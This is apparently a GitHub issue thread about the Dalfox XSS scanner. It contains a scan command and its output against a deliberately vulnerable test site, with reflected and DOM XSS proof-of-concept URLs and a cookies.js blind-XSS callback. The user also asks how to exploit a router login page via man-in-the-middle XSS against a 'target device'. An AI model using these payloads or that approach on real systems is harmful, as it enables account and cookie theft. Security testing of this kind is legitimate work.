Scanning Router Login pages

[CHillyVibes]

Question

Your questions
When I scan a router login page it doesn't show any exploitations availabe
but I know that the login page is epxloitable because it is susceptible to XSS during a mitma

Environment

• Dalfox Version: v2.8.2
• Installed from: (e.g go-get/snapcraft/homebrew)
  go

what method is available for me to exploit our given target?
thanks dev team btw what parameters would you consider using in order to see the
if our payload executed successfully without the url encoding

sudo ./dalfox url http://testphp.vulnweb.com/listproducts.php?cat=1 -b /home/kali/scripts/cookies.js

_..._

.' .::::. __ _ _ ___ _ __ __
: :::::::: | \ / \ | | | / \ V /
: :::::::: | o ) o || | | _( o )) (
'. '::::::' |/|n||_||| _//n
'-.::''

🌙🦊 Powerful open source XSS scanning tool and parameter analyzer, utility

🎯 Target http://testphp.vulnweb.com/listproducts.php?cat=1
🏁 Method GET
🖥 Worker 100
🔦 BAV true
⛏ Mining true (Gf-Patterns)
🔬 Mining-DOM true (mining from DOM)
🛰 Blind XSS Callback /home/kali/scripts/cookies.js
⏱ Timeout 10
📤 FollowRedirect false
🕰 Started at 2023-03-22 00:54:14.754845369 +0000 UTC m=+0.011778748

[*] 🦊 Start scan [SID:Single] / URL: http://testphp.vulnweb.com/listproducts.php?cat=1
[G] Found dalfox-error-mysql5 via built-in grepping / payload: toOpenRedirecting
check the manual that corresponds to your MySQL server version
[POC][G][GET][BUILTIN] http://testphp.vulnweb.com/listproducts.php?cat=%2F%2F%2F%2509%2Fgoogle.com
[I] Found 2 testing point in DOM base parameter mining
[I] Found 1 testing point in Dictionary base paramter mining
[I] Content-Type is text/html; charset=UTF-8
[I] Reflected cat param => PTYPE: URL Injected: /inHTML-none(1) $
48 line: Error: Unknown column '1DalFox' in 'where cl
[W] Reflected Payload in HTML: cat='>click
48 line: syntax to use near ''>click' at line 1
[POC][R][GET][inHTML-URL] http://testphp.vulnweb.com/listproducts.php?cat=1%27%3E%3Ca+href%3D%27javascript%26colon%3Balert%281%29%27%3Eclick
[V] Triggered XSS Payload (found DOM Object): cat=

1

[POC][V][GET][inHTML-none(1)-URL] http://testphp.vulnweb.com/listproducts.php?cat=1%3Cdiv+contextmenu%3Dxss%3E%3Cp%3E1%3Cmenu+type%3Dcontext+class%3Ddalfox+id%3Dxss+onshow%3Dprompt.valueOf%28%29%281%29%3E%3C%2Fmenu%3E%3C%2Fdiv%3E

[hahwul]

Hi @CHillyVibes
Thank you so much for submit issue!
I didn't understand the question exactly. Is it a question about false negatives?

Since Dalfox uses different payload combinations, somtimes.. you can also use payloads that require interaction. dalfox try to find an XSS that triggers as soon as it open in browser, preferably, but sometimes it gives me a slightly complicated PoC.

[ChillVibesMushroom]

Hi @CHillyVibes Thank you so much for submit issue! I didn't understand the question exactly. Is it a question about false negatives?

Since Dalfox uses different payload combinations, somtimes.. you can also use payloads that require interaction. dalfox try to find an XSS that triggers as soon as it open in browser, preferably, but sometimes it gives me a slightly complicated PoC.

It's about dalfox not showing vulnerabilities at all but I know the router login page is vulnerable to stored xss and reflected xss because I can inject scripts into the web page and execute scripts from the url bar when doing a mitma and visiting from a target device.

It works wonders against websites showing me vulnerabilities and I have even applied xss attacks with vulnerabilities found and they do exploit the web pages correctly. I'm looking for the same finds when targeting a router with the url being ipv4 192.168.1.1